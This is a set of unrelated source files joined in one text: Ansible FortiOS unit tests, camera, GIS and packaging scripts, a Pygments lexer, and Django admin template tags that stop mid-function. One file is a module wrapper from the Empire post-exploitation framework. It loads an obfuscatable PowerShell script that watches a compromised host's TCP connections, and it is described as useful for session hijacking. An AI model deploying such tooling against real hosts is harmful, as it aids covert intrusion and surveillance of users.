'mode-cfg': 'disable',
'name': 'default_name_70',
'nattraversal': 'enable',
'negotiate-timeout': '72',
'peer': 'test_value_73',
'peergrp': 'test_value_74',
'peerid': 'test_value_75',
'peertype': 'any',
'ppk': 'disable',
'ppk-identity': 'test_value_78',
'ppk-secret': 'test_value_79',
'priority': '80',
'proposal': 'des-md5',
'psksecret': 'test_value_82',
'psksecret-remote': 'test_value_83',
'reauth': 'disable',
'rekey': 'enable',
'remote-gw': 'test_value_86',
'remotegw-ddns': 'test_value_87',
'rsa-signature-format': 'pkcs1',
'save-password': 'disable',
'send-cert-chain': 'enable',
'signature-hash-alg': 'sha1',
'split-include-service': 'test_value_92',
'suite-b': 'disable',
'type': 'static',
'unity-support': 'disable',
'usrgrp': 'test_value_96',
'wizard-type': 'custom',
'xauthtype': 'disable'
}
set_method_mock.assert_called_with('vpn.ipsec', 'phase1', data=expected_data, vdom='root')
schema_method_mock.assert_not_called()
assert not is_error
assert not changed
assert response['status'] == 'error'
assert response['http_status'] == 404
def test_vpn_ipsec_phase1_filter_foreign_attributes(mocker):
schema_method_mock = mocker.patch('ansible.module_utils.network.fortios.fortios.FortiOSHandler.schema')
set_method_result = {'status': 'success', 'http_method': 'POST', 'http_status': 200}
set_method_mock = mocker.patch('ansible.module_utils.network.fortios.fortios.FortiOSHandler.set', return_value=set_method_result)
input_data = {
'username': 'admin',
'state': 'present',
'vpn_ipsec_phase1': {
'random_attribute_not_valid': 'tag',
'acct_verify': 'enable',
'add_gw_route': 'enable',
'add_route': 'disable',
'assign_ip': 'disable',
'assign_ip_from': 'range',
'authmethod': 'psk',
'authmethod_remote': 'psk',
'authpasswd': 'test_value_10',
'authusr': 'test_value_11',
'authusrgrp': 'test_value_12',
'auto_negotiate': 'enable',
'banner': 'test_value_14',
'cert_id_validation': 'enable',
'childless_ike': 'enable',
'client_auto_negotiate': 'disable',
'client_keep_alive': 'disable',
'comments': 'test_value_19',
'dhgrp': '1',
'digital_signature_auth': 'enable',
'distance': '22',
'dns_mode': 'manual',
'domain': 'test_value_24',
'dpd': 'disable',
'dpd_retrycount': '26',
'dpd_retryinterval': 'test_value_27',
'eap': 'enable',
'eap_identity': 'use-id-payload',
'enforce_unique_id': 'disable',
'forticlient_enforcement': 'enable',
'fragmentation': 'enable',
'fragmentation_mtu': '33',
'group_authentication': 'enable',
'group_authentication_secret': 'test_value_35',
'ha_sync_esp_seqno': 'enable',
'idle_timeout': 'enable',
'idle_timeoutinterval': '38',
'ike_version': '1',
'include_local_lan': 'disable',
'interface': 'test_value_41',
'ipv4_dns_server1': 'test_value_42',
'ipv4_dns_server2': 'test_value_43',
'ipv4_dns_server3': 'test_value_44',
'ipv4_end_ip': 'test_value_45',
'ipv4_name': 'test_value_46',
'ipv4_netmask': 'test_value_47',
'ipv4_split_exclude': 'test_value_48',
'ipv4_split_include': 'test_value_49',
'ipv4_start_ip': 'test_value_50',
'ipv4_wins_server1': 'test_value_51',
'ipv4_wins_server2': 'test_value_52',
'ipv6_dns_server1': 'test_value_53',
'ipv6_dns_server2': 'test_value_54',
'ipv6_dns_server3': 'test_value_55',
'ipv6_end_ip': 'test_value_56',
'ipv6_name': 'test_value_57',
'ipv6_prefix': '58',
'ipv6_split_exclude': 'test_value_59',
'ipv6_split_include': 'test_value_60',
'ipv6_start_ip': 'test_value_61',
'keepalive': '62',
'keylife': '63',
'local_gw': 'test_value_64',
'localid': 'test_value_65',
'localid_type': 'auto',
'mesh_selector_type': 'disable',
'mode': 'aggressive',
'mode_cfg': 'disable',
'name': 'default_name_70',
'nattraversal': 'enable',
'negotiate_timeout': '72',
'peer': 'test_value_73',
'peergrp': 'test_value_74',
'peerid': 'test_value_75',
'peertype': 'any',
'ppk': 'disable',
'ppk_identity': 'test_value_78',
'ppk_secret': 'test_value_79',
'priority': '80',
'proposal': 'des-md5',
'psksecret': 'test_value_82',
'psksecret_remote': 'test_value_83',
'reauth': 'disable',
'rekey': 'enable',
'remote_gw': 'test_value_86',
'remotegw_ddns': 'test_value_87',
'rsa_signature_format': 'pkcs1',
'save_password': 'disable',
'send_cert_chain': 'enable',
'signature_hash_alg': 'sha1',
'split_include_service': 'test_value_92',
'suite_b': 'disable',
'type': 'static',
'unity_support': 'disable',
'usrgrp': 'test_value_96',
'wizard_type': 'custom',
'xauthtype': 'disable'
},
'vdom': 'root'}
is_error, changed, response = fortios_vpn_ipsec_phase1.fortios_vpn_ipsec(input_data, fos_instance)
expected_data = {
'acct-verify': 'enable',
'add-gw-route': 'enable',
'add-route': 'disable',
'assign-ip': 'disable',
'assign-ip-from': 'range',
'authmethod': 'psk',
'authmethod-remote': 'psk',
'authpasswd': 'test_value_10',
'authusr': 'test_value_11',
'authusrgrp': 'test_value_12',
'auto-negotiate': 'enable',
'banner': 'test_value_14',
'cert-id-validation': 'enable',
'childless-ike': 'enable',
'client-auto-negotiate': 'disable',
'client-keep-alive': 'disable',
'comments': 'test_value_19',
'dhgrp': '1',
'digital-signature-auth': 'enable',
'distance': '22',
'dns-mode': 'manual',
'domain': 'test_value_24',
'dpd': 'disable',
'dpd-retrycount': '26',
'dpd-retryinterval': 'test_value_27',
'eap': 'enable',
'eap-identity': 'use-id-payload',
'enforce-unique-id': 'disable',
'forticlient-enforcement': 'enable',
'fragmentation': 'enable',
'fragmentation-mtu': '33',
'group-authentication': 'enable',
'group-authentication-secret': 'test_value_35',
'ha-sync-esp-seqno': 'enable',
'idle-timeout': 'enable',
'idle-timeoutinterval': '38',
'ike-version': '1',
'include-local-lan': 'disable',
'interface': 'test_value_41',
'ipv4-dns-server1': 'test_value_42',
'ipv4-dns-server2': 'test_value_43',
'ipv4-dns-server3': 'test_value_44',
'ipv4-end-ip': 'test_value_45',
'ipv4-name': 'test_value_46',
'ipv4-netmask': 'test_value_47',
'ipv4-split-exclude': 'test_value_48',
'ipv4-split-include': 'test_value_49',
'ipv4-start-ip': 'test_value_50',
'ipv4-wins-server1': 'test_value_51',
'ipv4-wins-server2': 'test_value_52',
'ipv6-dns-server1': 'test_value_53',
'ipv6-dns-server2': 'test_value_54',
'ipv6-dns-server3': 'test_value_55',
'ipv6-end-ip': 'test_value_56',
'ipv6-name': 'test_value_57',
'ipv6-prefix': '58',
'ipv6-split-exclude': 'test_value_59',
'ipv6-split-include': 'test_value_60',
'ipv6-start-ip': 'test_value_61',
'keepalive': '62',
'keylife': '63',
'local-gw': 'test_value_64',
'localid': 'test_value_65',
'localid-type': 'auto',
'mesh-selector-type': 'disable',
'mode': 'aggressive',
'mode-cfg': 'disable',
'name': 'default_name_70',
'nattraversal': 'enable',
'negotiate-timeout': '72',
'peer': 'test_value_73',
'peergrp': 'test_value_74',
'peerid': 'test_value_75',
'peertype': 'any',
'ppk': 'disable',
'ppk-identity': 'test_value_78',
'ppk-secret': 'test_value_79',
'priority': '80',
'proposal': 'des-md5',
'psksecret': 'test_value_82',
'psksecret-remote': 'test_value_83',
'reauth': 'disable',
'rekey': 'enable',
'remote-gw': 'test_value_86',
'remotegw-ddns': 'test_value_87',
'rsa-signature-format': 'pkcs1',
'save-password': 'disable',
'send-cert-chain': 'enable',
'signature-hash-alg': 'sha1',
'split-include-service': 'test_value_92',
'suite-b': 'disable',
'type': 'static',
'unity-support': 'disable',
'usrgrp': 'test_value_96',
'wizard-type': 'custom',
'xauthtype': 'disable'
}
set_method_mock.assert_called_with('vpn.ipsec', 'phase1', data=expected_data, vdom='root')
schema_method_mock.assert_not_called()
assert not is_error
assert changed
assert response['status'] == 'success'
assert response['http_status'] == 200
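# The assertions above depend on the module translating Ansible-style
# underscore keys (e.g. 'assign_ip_from') into the hyphenated keys the
# FortiOS API expects ('assign-ip-from'). A minimal sketch of that mapping
# (hypothetical standalone helper; the real module ships its own converter):
def _demo_underscore_to_hyphen(data):
    # Recursively rewrite dict keys; values and scalars pass through.
    if isinstance(data, dict):
        return dict((k.replace('_', '-'), _demo_underscore_to_hyphen(v))
                    for k, v in data.items())
    if isinstance(data, list):
        return [_demo_underscore_to_hyphen(item) for item in data]
    return data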
|
bneg/Empire
|
refs/heads/master
|
lib/modules/powershell/situational_awareness/host/monitortcpconnections.py
|
10
|
from lib.common import helpers
class Module:
def __init__(self, mainMenu, params=[]):
# metadata info about the module, not modified during runtime
self.info = {
# name for the module that will appear in module menus
'Name': 'Start-MonitorTCPConnections',
# list of one or more authors for the module
'Author': ['@erikbarzdukas'],
# more verbose multi-line description of the module
'Description': ('Monitors hosts for TCP connections to a specified domain name or IPv4 address.'
' Useful for session hijacking and finding users interacting with sensitive services.'),
# True if the module needs to run in the background
'Background' : True,
# File extension to save the file as
'OutputExtension' : None,
# True if the module needs admin rights to run
'NeedsAdmin' : False,
# True if the method doesn't touch disk/is reasonably opsec safe
'OpsecSafe' : True,
# the language for this module
'Language' : 'powershell',
# The minimum PowerShell version needed for the module to run
'MinLanguageVersion' : '2',
# list of any references/other comments
'Comments': [
'Based on code from Tim Ferrell.',
]
}
# any options needed by the module, settable during runtime
self.options = {
# format:
# value_name : {description, required, default_value}
'Agent' : {
# The 'Agent' option is the only one that MUST be in a module
'Description' : 'Agent to monitor from.',
'Required' : True,
'Value' : ''
},
'TargetDomain' : {
'Description' : 'Domain name or IPv4 address of target service.',
'Required' : True,
'Value' : ''
},
'CheckInterval' : {
'Description' : 'Interval in seconds to check for the connection',
'Required' : True,
'Value' : '15'
}
}
# save off a copy of the mainMenu object to access external functionality
# like listeners/agent handlers/etc.
self.mainMenu = mainMenu
# During instantiation, any settable option parameters
# are passed as an object set to the module and the
# options dictionary is automatically set. This is mostly
# in case options are passed on the command line
if params:
for param in params:
# parameter format is [Name, Value]
option, value = param
if option in self.options:
self.options[option]['Value'] = value
def generate(self, obfuscate=False, obfuscationCommand=""):
# the PowerShell script itself, with the command to invoke
# for execution appended to the end. Scripts should output
# everything to the pipeline for proper parsing.
#
# the script should be stripped of comments, with a link to any
# original reference script included in the comments.
        # if you're reading in a large, external script that might be updated,
# use the pattern below
# read in the common module source code
moduleSource = self.mainMenu.installPath + "/data/module_source/situational_awareness/host/Start-MonitorTCPConnections.ps1"
if obfuscate:
helpers.obfuscate_module(moduleSource=moduleSource, obfuscationCommand=obfuscationCommand)
moduleSource = moduleSource.replace("module_source", "obfuscated_module_source")
try:
f = open(moduleSource, 'r')
except:
print helpers.color("[!] Could not read module source path at: " + str(moduleSource))
return ""
moduleCode = f.read()
f.close()
script = moduleCode
scriptEnd = "Start-TCPMonitor"
# add any arguments to the end execution of the script
for option,values in self.options.iteritems():
if option.lower() != "agent":
if values['Value'] and values['Value'] != '':
if values['Value'].lower() == "true":
# if we're just adding a switch
scriptEnd += " -" + str(option)
else:
scriptEnd += " -" + str(option) + " " + str(values['Value'])
if obfuscate:
scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
script += scriptEnd
return script
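# A standalone, hypothetical re-implementation of the argument-rendering
# loop in generate() above, for illustration only (not used by Empire;
# argument order follows dict iteration order):
def _demo_render_invocation(options):
    end = "Start-TCPMonitor"
    for option, values in options.items():
        if option.lower() != "agent" and values['Value']:
            if str(values['Value']).lower() == "true":
                # boolean options become bare switches
                end += " -" + str(option)
            else:
                end += " -" + str(option) + " " + str(values['Value'])
    return end
# _demo_render_invocation({'TargetDomain': {'Value': 'corp.example.com'}})
# -> 'Start-TCPMonitor -TargetDomain corp.example.com'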
|
pupil-labs/pyv4l2
|
refs/heads/master
|
example.py
|
1
|
import v4l2
import logging
# import cv2
from time import time
logging.basicConfig(level=logging.DEBUG)
from time import time,sleep
import numpy as np
if v4l2.list_devices() ==[]:
exit()
print v4l2.list_devices()
cap = v4l2.Capture("/dev/video0")
print cap.get_info()
cap.transport_formats
print cap.frame_rate
print cap.frame_size
print cap.transport_format,cap.transport_formats
cap.frame_size = (1920, 1080)
cap.frame_rate= (1,120)
controls = cap.enum_controls()
print controls
cap.set_control(controls[0]['id'],controls[0]['default'])
print cap.get_control(controls[0]['id'])
print 'Will capture at:',cap.transport_format,cap.frame_size,cap.frame_rate
for x in range(20):
try:
frame = cap.get_frame_robust()
except IOError:
print "could not grab frame"
break
# print frame.width,frame.height
# print frame.d
# y= frame.gray
# print v.shape
img = frame.yuv
y,u,v = img
# y = frame.bgr
# print y.data
    # y = np.ones((1080, 1920, 1))
    # print y.shape
    # print u.shape
# cv2.imshow("img",y)
# cv2.imshow("u",u)
# cv2.imshow("v",v)
# cv2.waitKey(1)
# print img
cap.close()
cap = None
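# If OpenCV is installed, the planar output unpacked above can be previewed;
# a sketch assuming y is a 2-D uint8 luma plane (uncomment to try):
# import cv2
# cv2.imshow("luma", y)
# cv2.waitKey(0)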
|
spaceof7/QGIS
|
refs/heads/master
|
python/plugins/processing/algs/grass7/ext/v_lrs_segment.py
|
5
|
# -*- coding: utf-8 -*-
"""
***************************************************************************
v_lrs_segment.py
----------------
Date : March 2016
Copyright : (C) 2016 by Médéric Ribreux
Email : medspx at medspx dot fr
***************************************************************************
* *
* This program is free software; you can redistribute it and/or modify *
* it under the terms of the GNU General Public License as published by *
* the Free Software Foundation; either version 2 of the License, or *
* (at your option) any later version. *
* *
***************************************************************************
"""
__author__ = 'Médéric Ribreux'
__date__ = 'March 2016'
__copyright__ = '(C) 2016, Médéric Ribreux'
# This will get replaced with a git SHA1 when you do a git archive
__revision__ = '$Format:%H$'
def checkParameterValuesBeforeExecuting(alg):
""" Verify if we have the right parameters """
if alg.getParameterValue('in_file') and alg.getParameterValue(u'file'):
        return alg.tr("You need to set either a segment rules file or write the rules directly!")
return None
def processInputs(alg):
# We need to import the rstable
rstable = alg.getParameterValue('rstable')
if rstable in list(alg.exportedLayers.keys()):
return
alg.exportedLayers[rstable] = alg.getTempFilename()
command = 'db.in.ogr input=\"{}\" output={} --overwrite'.format(
rstable,
alg.exportedLayers[rstable]
)
alg.commands.append(command)
    alg.processInputs()
def processCommand(alg, parameters):
in_file = alg.getParameterValue('in_file')
if in_file:
# Creates a temporary txt file
ruleFile = alg.getTempFilename()
# Inject rules into temporary txt file
with open(ruleFile, "w") as tempRules:
tempRules.write(in_file)
else:
ruleFile = alg.getParameterValue('file')
output = alg.getOutputFromName(u'output')
alg.exportedLayers[output.value] = output.name + alg.uniqueSuffix
command = 'v.lrs.segment input={} file={} rstable={} output={} --overwrite'.format(
alg.exportedLayers[alg.getParameterValue('input')],
ruleFile,
alg.exportedLayers[alg.getParameterValue('rstable')],
alg.exportedLayers[output.value]
)
alg.commands.append(command)
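# A standalone sketch of the command assembly above, with hypothetical
# layer names, to show the shape of the generated GRASS call:
def _demo_build_command(in_layer, rule_file, rstable_layer, out_layer):
    return 'v.lrs.segment input={} file={} rstable={} output={} --overwrite'.format(
        in_layer, rule_file, rstable_layer, out_layer)
# _demo_build_command('roads_a1', '/tmp/rules.txt', 'rstable_a1', 'output_a1')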
|
bioconda/bioconda-utils
|
refs/heads/master
|
setup.py
|
1
|
# -*- coding: UTF-8 -*-
from setuptools import setup, find_packages
import versioneer
setup(
name='bioconda-utils',
author="Johannes Köster, Ryan Dale, The Bioconda Team",
description="Utilities for building and managing conda packages",
license="MIT",
packages=find_packages(exclude=['test']),
include_package_data=True,
data_files=[
(
'bioconda_utils',
[
'bioconda_utils/bioconda_utils-requirements.txt',
'bioconda_utils/config.schema.yaml',
],
)
],
entry_points={"console_scripts": [
"bioconda-utils = bioconda_utils.cli:main"
]},
classifiers=[
"Development Status :: 4 - Beta",
# "Development Status :: 5 - Production/Stable",
"Environment :: Console",
"Intended Audience :: Science/Research",
"License :: OSI Approved :: MIT License",
"Natural Language :: English",
"Programming Language :: Python :: 3"
],
version=versioneer.get_version(),
cmdclass=versioneer.get_cmdclass(),
)
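# After an install (e.g. `pip install .`), setuptools exposes the console
# script declared in entry_points above, so the CLI is reachable as:
#   bioconda-utils --help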
|
shenyushun/cookiecutter-simple-django-cn
|
refs/heads/master
|
{{cookiecutter.project_slug}}/manage.py
|
78
|
#!/usr/bin/env python
import os
import sys
if __name__ == '__main__':
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'config.settings.local')
from django.core.management import execute_from_command_line
execute_from_command_line(sys.argv)
|
pdellaert/ansible
|
refs/heads/devel
|
test/units/modules/network/fortios/test_fortios_wireless_controller_hotspot20_icon.py
|
21
|
# Copyright 2019 Fortinet, Inc.
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <https://www.gnu.org/licenses/>.
# Make coding more python3-ish
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
import os
import json
import pytest
from mock import ANY
from ansible.module_utils.network.fortios.fortios import FortiOSHandler
try:
from ansible.modules.network.fortios import fortios_wireless_controller_hotspot20_icon
except ImportError:
pytest.skip("Could not load required modules for testing", allow_module_level=True)
@pytest.fixture(autouse=True)
def connection_mock(mocker):
connection_class_mock = mocker.patch('ansible.modules.network.fortios.fortios_wireless_controller_hotspot20_icon.Connection')
return connection_class_mock
fos_instance = FortiOSHandler(connection_mock)
def test_wireless_controller_hotspot20_icon_creation(mocker):
schema_method_mock = mocker.patch('ansible.module_utils.network.fortios.fortios.FortiOSHandler.schema')
set_method_result = {'status': 'success', 'http_method': 'POST', 'http_status': 200}
set_method_mock = mocker.patch('ansible.module_utils.network.fortios.fortios.FortiOSHandler.set', return_value=set_method_result)
input_data = {
'username': 'admin',
'state': 'present',
'wireless_controller_hotspot20_icon': {'name': 'default_name_3'
},
'vdom': 'root'}
is_error, changed, response = fortios_wireless_controller_hotspot20_icon.fortios_wireless_controller_hotspot20(input_data, fos_instance)
expected_data = {'name': 'default_name_3'
}
set_method_mock.assert_called_with('wireless-controller.hotspot20', 'icon', data=expected_data, vdom='root')
schema_method_mock.assert_not_called()
assert not is_error
assert changed
assert response['status'] == 'success'
assert response['http_status'] == 200
def test_wireless_controller_hotspot20_icon_creation_fails(mocker):
schema_method_mock = mocker.patch('ansible.module_utils.network.fortios.fortios.FortiOSHandler.schema')
set_method_result = {'status': 'error', 'http_method': 'POST', 'http_status': 500}
set_method_mock = mocker.patch('ansible.module_utils.network.fortios.fortios.FortiOSHandler.set', return_value=set_method_result)
input_data = {
'username': 'admin',
'state': 'present',
'wireless_controller_hotspot20_icon': {'name': 'default_name_3'
},
'vdom': 'root'}
is_error, changed, response = fortios_wireless_controller_hotspot20_icon.fortios_wireless_controller_hotspot20(input_data, fos_instance)
expected_data = {'name': 'default_name_3'
}
set_method_mock.assert_called_with('wireless-controller.hotspot20', 'icon', data=expected_data, vdom='root')
schema_method_mock.assert_not_called()
assert is_error
assert not changed
assert response['status'] == 'error'
assert response['http_status'] == 500
def test_wireless_controller_hotspot20_icon_removal(mocker):
schema_method_mock = mocker.patch('ansible.module_utils.network.fortios.fortios.FortiOSHandler.schema')
delete_method_result = {'status': 'success', 'http_method': 'POST', 'http_status': 200}
delete_method_mock = mocker.patch('ansible.module_utils.network.fortios.fortios.FortiOSHandler.delete', return_value=delete_method_result)
input_data = {
'username': 'admin',
'state': 'absent',
'wireless_controller_hotspot20_icon': {'name': 'default_name_3'
},
'vdom': 'root'}
is_error, changed, response = fortios_wireless_controller_hotspot20_icon.fortios_wireless_controller_hotspot20(input_data, fos_instance)
delete_method_mock.assert_called_with('wireless-controller.hotspot20', 'icon', mkey=ANY, vdom='root')
schema_method_mock.assert_not_called()
assert not is_error
assert changed
assert response['status'] == 'success'
assert response['http_status'] == 200
def test_wireless_controller_hotspot20_icon_deletion_fails(mocker):
schema_method_mock = mocker.patch('ansible.module_utils.network.fortios.fortios.FortiOSHandler.schema')
delete_method_result = {'status': 'error', 'http_method': 'POST', 'http_status': 500}
delete_method_mock = mocker.patch('ansible.module_utils.network.fortios.fortios.FortiOSHandler.delete', return_value=delete_method_result)
input_data = {
'username': 'admin',
'state': 'absent',
'wireless_controller_hotspot20_icon': {'name': 'default_name_3'
},
'vdom': 'root'}
is_error, changed, response = fortios_wireless_controller_hotspot20_icon.fortios_wireless_controller_hotspot20(input_data, fos_instance)
delete_method_mock.assert_called_with('wireless-controller.hotspot20', 'icon', mkey=ANY, vdom='root')
schema_method_mock.assert_not_called()
assert is_error
assert not changed
assert response['status'] == 'error'
assert response['http_status'] == 500
def test_wireless_controller_hotspot20_icon_idempotent(mocker):
schema_method_mock = mocker.patch('ansible.module_utils.network.fortios.fortios.FortiOSHandler.schema')
set_method_result = {'status': 'error', 'http_method': 'DELETE', 'http_status': 404}
set_method_mock = mocker.patch('ansible.module_utils.network.fortios.fortios.FortiOSHandler.set', return_value=set_method_result)
input_data = {
'username': 'admin',
'state': 'present',
'wireless_controller_hotspot20_icon': {'name': 'default_name_3'
},
'vdom': 'root'}
is_error, changed, response = fortios_wireless_controller_hotspot20_icon.fortios_wireless_controller_hotspot20(input_data, fos_instance)
expected_data = {'name': 'default_name_3'
}
set_method_mock.assert_called_with('wireless-controller.hotspot20', 'icon', data=expected_data, vdom='root')
schema_method_mock.assert_not_called()
assert not is_error
assert not changed
assert response['status'] == 'error'
assert response['http_status'] == 404
def test_wireless_controller_hotspot20_icon_filter_foreign_attributes(mocker):
schema_method_mock = mocker.patch('ansible.module_utils.network.fortios.fortios.FortiOSHandler.schema')
set_method_result = {'status': 'success', 'http_method': 'POST', 'http_status': 200}
set_method_mock = mocker.patch('ansible.module_utils.network.fortios.fortios.FortiOSHandler.set', return_value=set_method_result)
input_data = {
'username': 'admin',
'state': 'present',
'wireless_controller_hotspot20_icon': {
'random_attribute_not_valid': 'tag', 'name': 'default_name_3'
},
'vdom': 'root'}
is_error, changed, response = fortios_wireless_controller_hotspot20_icon.fortios_wireless_controller_hotspot20(input_data, fos_instance)
expected_data = {'name': 'default_name_3'
}
set_method_mock.assert_called_with('wireless-controller.hotspot20', 'icon', data=expected_data, vdom='root')
schema_method_mock.assert_not_called()
assert not is_error
assert changed
assert response['status'] == 'success'
assert response['http_status'] == 200
|
madjar/cython
|
refs/heads/master
|
docs/sphinxext/ipython_console_highlighting.py
|
31
|
from pygments.lexer import Lexer, do_insertions
from pygments.lexers.agile import PythonConsoleLexer, PythonLexer, \
PythonTracebackLexer
from pygments.token import Comment, Generic
from sphinx import highlighting
import re
line_re = re.compile('.*?\n')
class IPythonConsoleLexer(Lexer):
"""
    For IPython console output or doctests, such as:
    .. sourcecode:: ipython
      In [1]: a = 'foo'
      In [2]: a
      Out[2]: 'foo'
      In [3]: print a
      foo
      In [4]: 1 / 0
    Tracebacks are not currently supported.
    """
name = 'IPython console session'
aliases = ['ipython']
mimetypes = ['text/x-ipython-console']
input_prompt = re.compile("(In \[[0-9]+\]: )|( \.\.\.+:)")
output_prompt = re.compile("(Out\[[0-9]+\]: )|( \.\.\.+:)")
continue_prompt = re.compile(" \.\.\.+:")
tb_start = re.compile("\-+")
def get_tokens_unprocessed(self, text):
pylexer = PythonLexer(**self.options)
tblexer = PythonTracebackLexer(**self.options)
curcode = ''
insertions = []
for match in line_re.finditer(text):
line = match.group()
input_prompt = self.input_prompt.match(line)
continue_prompt = self.continue_prompt.match(line.rstrip())
output_prompt = self.output_prompt.match(line)
if line.startswith("#"):
insertions.append((len(curcode),
[(0, Comment, line)]))
elif input_prompt is not None:
insertions.append((len(curcode),
[(0, Generic.Prompt, input_prompt.group())]))
curcode += line[input_prompt.end():]
elif continue_prompt is not None:
insertions.append((len(curcode),
[(0, Generic.Prompt, continue_prompt.group())]))
curcode += line[continue_prompt.end():]
elif output_prompt is not None:
insertions.append((len(curcode),
[(0, Generic.Output, output_prompt.group())]))
curcode += line[output_prompt.end():]
else:
if curcode:
for item in do_insertions(insertions,
pylexer.get_tokens_unprocessed(curcode)):
yield item
curcode = ''
insertions = []
yield match.start(), Generic.Output, line
if curcode:
for item in do_insertions(insertions,
pylexer.get_tokens_unprocessed(curcode)):
yield item
def setup(app):
app.add_lexer('ipython', IPythonConsoleLexer())
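if __name__ == '__main__':
    # Ad-hoc smoke test outside Sphinx: tokenize a toy console session and
    # dump the token stream (exact tokens depend on the installed Pygments
    # version; the sample text is illustrative).
    sample = "In [1]: a = 'foo'\nOut[1]: 'foo'\n"
    for pos, token, text in IPythonConsoleLexer().get_tokens_unprocessed(sample):
        print pos, token, repr(text)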
|
abhattad4/Digi-Menu
|
refs/heads/master
|
tests/utils_tests/test_itercompat.py
|
569
|
from django.test import TestCase
from .models import Category, Thing
class TestIsIterator(TestCase):
def test_regression(self):
"""This failed on Django 1.5/Py2.6 because category has a next method."""
category = Category.objects.create(name='category')
Thing.objects.create(category=category)
Thing.objects.filter(category=category)
|
karyon/django
|
refs/heads/master
|
django/contrib/admin/templatetags/admin_list.py
|
30
|
from __future__ import unicode_literals
import datetime
import warnings
from django.contrib.admin.templatetags.admin_urls import add_preserved_filters
from django.contrib.admin.utils import (
display_for_field, display_for_value, label_for_field, lookup_field,
)
from django.contrib.admin.views.main import (
ALL_VAR, ORDER_VAR, PAGE_VAR, SEARCH_VAR,
)
from django.core.exceptions import ObjectDoesNotExist
from django.db import models
from django.template import Library
from django.template.loader import get_template
from django.templatetags.static import static
from django.urls import NoReverseMatch
from django.utils import formats
from django.utils.deprecation import RemovedInDjango20Warning
from django.utils.encoding import force_text
from django.utils.html import format_html
from django.utils.safestring import mark_safe
from django.utils.text import capfirst
from django.utils.translation import ugettext as _
register = Library()
DOT = '.'
@register.simple_tag
def paginator_number(cl, i):
"""
Generates an individual page index link in a paginated list.
"""
if i == DOT:
return '... '
elif i == cl.page_num:
return format_html('<span class="this-page">{}</span> ', i + 1)
else:
return format_html('<a href="{}"{}>{}</a> ',
cl.get_query_string({PAGE_VAR: i}),
mark_safe(' class="end"' if i == cl.paginator.num_pages - 1 else ''),
i + 1)
@register.inclusion_tag('admin/pagination.html')
def pagination(cl):
"""
Generates the series of links to the pages in a paginated list.
"""
paginator, page_num = cl.paginator, cl.page_num
pagination_required = (not cl.show_all or not cl.can_show_all) and cl.multi_page
if not pagination_required:
page_range = []
else:
ON_EACH_SIDE = 3
ON_ENDS = 2
# If there are 10 or fewer pages, display links to every page.
        # Otherwise, do some fancy pagination that skips the middle pages.
if paginator.num_pages <= 10:
page_range = range(paginator.num_pages)
else:
# Insert "smart" pagination links, so that there are always ON_ENDS
# links at either end of the list of pages, and there are always
# ON_EACH_SIDE links at either end of the "current page" link.
page_range = []
if page_num > (ON_EACH_SIDE + ON_ENDS):
page_range.extend(range(0, ON_ENDS))
page_range.append(DOT)
page_range.extend(range(page_num - ON_EACH_SIDE, page_num + 1))
else:
page_range.extend(range(0, page_num + 1))
if page_num < (paginator.num_pages - ON_EACH_SIDE - ON_ENDS - 1):
page_range.extend(range(page_num + 1, page_num + ON_EACH_SIDE + 1))
page_range.append(DOT)
page_range.extend(range(paginator.num_pages - ON_ENDS, paginator.num_pages))
else:
page_range.extend(range(page_num + 1, paginator.num_pages))
need_show_all_link = cl.can_show_all and not cl.show_all and cl.multi_page
return {
'cl': cl,
'pagination_required': pagination_required,
'show_all_url': need_show_all_link and cl.get_query_string({ALL_VAR: ''}),
'page_range': page_range,
'ALL_VAR': ALL_VAR,
'1': 1,
}
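# Worked example of the "smart" page_range above: with num_pages=20,
# page_num=9 (zero-based), ON_EACH_SIDE=3 and ON_ENDS=2, the list becomes
# [0, 1, '.', 6, 7, 8, 9, 10, 11, 12, '.', 18, 19], which the template
# renders one-based as: 1 2 ... 7 8 9 10 11 12 13 ... 19 20.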
def result_headers(cl):
"""
Generates the list column headers.
"""
ordering_field_columns = cl.get_ordering_field_columns()
for i, field_name in enumerate(cl.list_display):
text, attr = label_for_field(
field_name, cl.model,
model_admin=cl.model_admin,
return_attr=True
)
if attr:
field_name = _coerce_field_name(field_name, i)
# Potentially not sortable
# if the field is the action checkbox: no sorting and special class
if field_name == 'action_checkbox':
yield {
"text": text,
"class_attrib": mark_safe(' class="action-checkbox-column"'),
"sortable": False,
}
continue
admin_order_field = getattr(attr, "admin_order_field", None)
if not admin_order_field:
# Not sortable
yield {
"text": text,
"class_attrib": format_html(' class="column-{}"', field_name),
"sortable": False,
}
continue
# OK, it is sortable if we got this far
th_classes = ['sortable', 'column-{}'.format(field_name)]
order_type = ''
new_order_type = 'asc'
sort_priority = 0
sorted = False
# Is it currently being sorted on?
if i in ordering_field_columns:
sorted = True
order_type = ordering_field_columns.get(i).lower()
sort_priority = list(ordering_field_columns).index(i) + 1
th_classes.append('sorted %sending' % order_type)
new_order_type = {'asc': 'desc', 'desc': 'asc'}[order_type]
# build new ordering param
o_list_primary = [] # URL for making this field the primary sort
o_list_remove = [] # URL for removing this field from sort
o_list_toggle = [] # URL for toggling order type for this field
def make_qs_param(t, n):
return ('-' if t == 'desc' else '') + str(n)
for j, ot in ordering_field_columns.items():
if j == i: # Same column
param = make_qs_param(new_order_type, j)
# We want clicking on this header to bring the ordering to the
# front
o_list_primary.insert(0, param)
o_list_toggle.append(param)
# o_list_remove - omit
else:
param = make_qs_param(ot, j)
o_list_primary.append(param)
o_list_toggle.append(param)
o_list_remove.append(param)
if i not in ordering_field_columns:
o_list_primary.insert(0, make_qs_param(new_order_type, i))
yield {
"text": text,
"sortable": True,
"sorted": sorted,
"ascending": order_type == "asc",
"sort_priority": sort_priority,
"url_primary": cl.get_query_string({ORDER_VAR: '.'.join(o_list_primary)}),
"url_remove": cl.get_query_string({ORDER_VAR: '.'.join(o_list_remove)}),
"url_toggle": cl.get_query_string({ORDER_VAR: '.'.join(o_list_toggle)}),
